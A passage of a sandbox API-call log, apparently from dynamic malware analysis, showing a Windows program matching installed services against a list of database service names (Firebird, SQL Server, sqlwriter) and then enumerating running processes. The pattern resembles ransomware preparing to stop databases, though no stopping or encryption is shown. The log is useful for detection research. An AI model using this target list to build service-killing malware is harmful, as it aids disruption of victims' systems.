(lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0219.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0219.464] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0219.464] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0219.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0219.464] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0219.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0219.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0219.464] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0219.464] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0219.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0219.464] lstrlenW (lpString="Audiosrv") returned 8 [0219.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0219.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0219.464] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0219.464] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0219.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0219.464] lstrlenW (lpString="BFE") returned 3 [0219.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0219.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0219.464] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0219.464] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0219.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0219.464] lstrlenW (lpString="BITS") returned 4 [0219.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0219.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0219.465] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0219.465] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0219.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0219.465] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0219.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0219.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0219.465] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0219.465] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0219.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0219.465] lstrlenW (lpString="CDPSvc") returned 6 [0219.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0219.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0219.465] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0219.465] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0219.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0219.465] lstrlenW (lpString="ClickToRunSvc") returned 13 [0219.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0219.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0219.465] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0219.465] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0219.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0219.465] lstrlenW (lpString="ClipSVC") returned 7 [0219.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0219.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0219.465] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0219.465] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0219.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0219.465] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0219.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0219.466] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0219.466] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0219.466] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0219.466] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0219.466] lstrlenW (lpString="CryptSvc") returned 8 [0219.466] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0219.466] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0219.466] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0219.466] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0219.466] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0219.466] lstrlenW (lpString="DcomLaunch") returned 10 [0219.466] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0219.466] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0219.466] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0219.466] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0219.466] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0219.466] lstrlenW (lpString="DeviceAssociationService") returned 24 [0219.466] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0219.466] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0219.466] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0219.466] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0219.466] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0219.466] lstrlenW (lpString="Dhcp") returned 4 [0219.466] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0219.466] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0219.466] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0219.466] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0219.466] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0219.466] lstrlenW (lpString="Dnscache") returned 8 [0219.466] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0219.466] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0219.466] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0219.467] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0219.467] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0219.467] lstrlenW (lpString="DoSvc") returned 5 [0219.467] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0219.467] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0219.467] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0219.467] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0219.467] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0219.467] lstrlenW (lpString="DPS") returned 3 [0219.467] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0219.467] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0219.467] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0219.467] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0219.467] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0219.467] lstrlenW (lpString="DusmSvc") returned 7 [0219.467] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0219.467] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0219.467] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0219.467] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0219.467] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0219.467] lstrlenW (lpString="EventLog") returned 8 [0219.467] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0219.467] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0219.467] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0219.467] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0219.467] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0219.467] lstrlenW (lpString="EventSystem") returned 11 [0219.467] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0219.467] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0219.467] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0219.467] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0219.467] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0219.468] lstrlenW (lpString="FontCache") returned 9 [0219.468] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0219.468] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0219.468] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0219.468] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0219.468] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0219.468] lstrlenW (lpString="gpsvc") returned 5 [0219.468] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0219.468] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0219.468] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0219.468] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0219.468] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0219.468] lstrlenW (lpString="iphlpsvc") returned 8 [0219.468] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0219.468] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0219.468] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0219.468] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0219.468] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0219.468] lstrlenW (lpString="KeyIso") returned 6 [0219.468] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0219.468] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0219.468] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0219.468] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0219.468] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0219.468] lstrlenW (lpString="LanmanServer") returned 12 [0219.468] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0219.468] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0219.468] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0219.468] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0219.468] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0219.468] lstrlenW (lpString="LanmanWorkstation") returned 17 [0219.469] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0219.469] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0219.469] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0219.469] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0219.469] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0219.469] lstrlenW (lpString="lfsvc") returned 5 [0219.469] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0219.469] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0219.469] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0219.469] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0219.469] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0219.469] lstrlenW (lpString="LicenseManager") returned 14 [0219.469] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0219.469] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0219.469] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0219.469] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0219.469] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0219.469] lstrlenW (lpString="lmhosts") returned 7 [0219.469] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0219.469] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0219.469] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0219.469] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0219.469] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0219.469] lstrlenW (lpString="LSM") returned 3 [0219.469] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0219.469] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0219.469] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0219.469] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0219.469] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0219.469] lstrlenW (lpString="MpsSvc") returned 6 [0219.469] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0219.470] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0219.470] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0219.470] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0219.470] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0219.470] lstrlenW (lpString="NcbService") returned 10 [0219.470] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0219.470] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0219.470] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0219.470] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0219.470] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0219.470] lstrlenW (lpString="netprofm") returned 8 [0219.470] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0219.470] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0219.470] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0219.470] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0219.470] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0219.470] lstrlenW (lpString="NlaSvc") returned 6 [0219.470] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0219.470] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0219.470] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0219.470] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0219.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0219.704] lstrlenW (lpString="nsi") returned 3 [0219.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0219.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0219.704] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0219.704] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0219.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0219.704] lstrlenW (lpString="PcaSvc") returned 6 [0219.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0219.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0219.705] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0219.705] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0219.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0219.705] lstrlenW (lpString="PlugPlay") returned 8 [0219.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0219.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0219.705] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0219.705] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0219.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0219.705] lstrlenW (lpString="Power") returned 5 [0219.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0219.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0219.705] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0219.705] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0219.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0219.705] lstrlenW (lpString="ProfSvc") returned 7 [0219.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0219.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0219.706] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0219.706] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0219.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0219.706] lstrlenW (lpString="RpcEptMapper") returned 12 [0219.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0219.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0219.706] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0219.706] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0219.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0219.706] lstrlenW (lpString="RpcSs") returned 5 [0219.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0219.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0219.706] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0219.706] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0219.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0219.706] lstrlenW (lpString="SamSs") returned 5 [0219.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0219.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0219.706] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0219.706] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0219.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0219.706] lstrlenW (lpString="Schedule") returned 8 [0219.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0219.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0219.706] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0219.706] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0219.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0219.707] lstrlenW (lpString="SecurityHealthService") returned 21 [0219.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0219.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0219.707] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0219.707] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0219.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0219.707] lstrlenW (lpString="SENS") returned 4 [0219.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0219.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0219.707] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0219.707] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0219.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0219.707] lstrlenW (lpString="ShellHWDetection") returned 16 [0219.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0219.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0219.707] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0219.707] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0219.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0219.707] lstrlenW (lpString="Spooler") returned 7 [0219.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0219.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0219.707] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0219.707] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0219.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0219.707] lstrlenW (lpString="sppsvc") returned 6 [0219.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0219.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0219.707] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0219.708] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0219.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0219.708] lstrlenW (lpString="SSDPSRV") returned 7 [0219.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0219.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0219.708] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0219.708] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0219.708] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x430 [0219.714] Process32FirstW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.715] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0219.716] lstrlenW (lpString="System") returned 6 [0219.716] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0219.717] lstrlenW (lpString="smss.exe") returned 8 [0219.717] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.718] lstrlenW (lpString="csrss.exe") returned 9 [0219.718] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0219.719] lstrlenW (lpString="wininit.exe") returned 11 [0219.719] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.720] lstrlenW (lpString="csrss.exe") returned 9 [0219.720] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0219.721] lstrlenW (lpString="winlogon.exe") returned 12 [0219.722] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0219.723] lstrlenW (lpString="services.exe") returned 12 [0219.723] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0219.724] lstrlenW (lpString="lsass.exe") returned 9 [0219.724] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, 